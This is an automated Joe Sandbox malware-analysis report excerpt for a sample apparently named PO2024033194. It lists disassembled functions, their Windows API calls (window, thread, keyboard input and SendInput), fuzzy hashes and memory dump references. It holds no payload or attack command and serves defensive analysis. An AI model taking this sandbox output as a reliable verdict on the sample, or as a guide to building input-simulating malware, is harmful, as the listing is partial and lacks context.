                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Enable$Show$MessageMoveSend
                                                                  • String ID:
                                                                  • API String ID: 896007046-0
                                                                  • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                  • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                                  • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                  • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                                  Function 00448AB2 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                  • GetFocus.USER32 ref: 00448ACF
                                                                  • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                  • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                  • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                  • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                  • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Enable$Show$FocusMessageSend
                                                                  • String ID:
                                                                  • API String ID: 3429747543-0
                                                                  • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                  • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                                  • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                  • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                                  Function 00401250 Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                    • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                    • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                  • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                  • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                  • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                  • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                  • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                  • String ID:
                                                                  • API String ID: 3300667738-0
                                                                  • Opcode ID: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                  • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                  • Opcode Fuzzy Hash: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                  • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                                  Function 0045D448 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                  • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                  • __swprintf.LIBCMT ref: 0045D4E9
                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                                  • String ID: %lu$\VH
                                                                  • API String ID: 3164766367-2432546070
                                                                  • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                  • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                  • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                  • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                  Function 00450B7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                  • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                  • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: Msctls_Progress32
                                                                  • API String ID: 3850602802-3636473452
                                                                  • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                  • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                  • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                  • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                                  Function 00455531 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                  • String ID:
                                                                  • API String ID: 3985565216-0
                                                                  • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                  • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                                  • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                  • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                                  Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _malloc.LIBCMT ref: 0041F707
                                                                    • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                    • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                    • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                  • _free.LIBCMT ref: 0041F71A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap_free_malloc
                                                                  • String ID: [B
                                                                  • API String ID: 1020059152-632041663
                                                                  • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                  • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                  • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                  • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                                  Function 00413D7F Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                                  • __calloc_crt.LIBCMT ref: 00413DB0
                                                                  • __getptd.LIBCMT ref: 00413DBD
                                                                  • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                                  • _free.LIBCMT ref: 00413E07
                                                                  • __dosmaperr.LIBCMT ref: 00413E12
                                                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                  • String ID:
                                                                  • API String ID: 155776804-0
                                                                  • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                  • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                                  • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                  • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                                  Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                    • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                  • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                  • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                  • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                  • String ID:
                                                                  • API String ID: 1957940570-0
                                                                  • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                  • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                  • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                  • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                  Function 00413D1A Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                    • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                    • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                  • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                    • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                  • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                  • ExitThread.KERNEL32 ref: 00413D4E
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                  • __freefls@4.LIBCMT ref: 00413D74
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                  • String ID:
                                                                  • API String ID: 259663610-0
                                                                  • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                  • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                                  • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                  • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                                  Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetClientRect.USER32(?,?), ref: 004302E6
                                                                  • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                  • GetClientRect.USER32(?,?), ref: 00430364
                                                                  • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                  • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                  • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                  • String ID:
                                                                  • API String ID: 3220332590-0
                                                                  • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                  • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                  • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                  • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                  Function 004577E9 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                  • String ID:
                                                                  • API String ID: 1612042205-0
                                                                  • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                  • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                                  • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                  • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                  Function 0044F1D3 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 422COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove_strncmp
                                                                  • String ID: >$U$\
                                                                  • API String ID: 2666721431-237099441
                                                                  • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                  • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                                  • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                  • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                                  Function 0044C514 Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?), ref: 0044C570
                                                                  • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                  • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                  • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                  • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                  • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
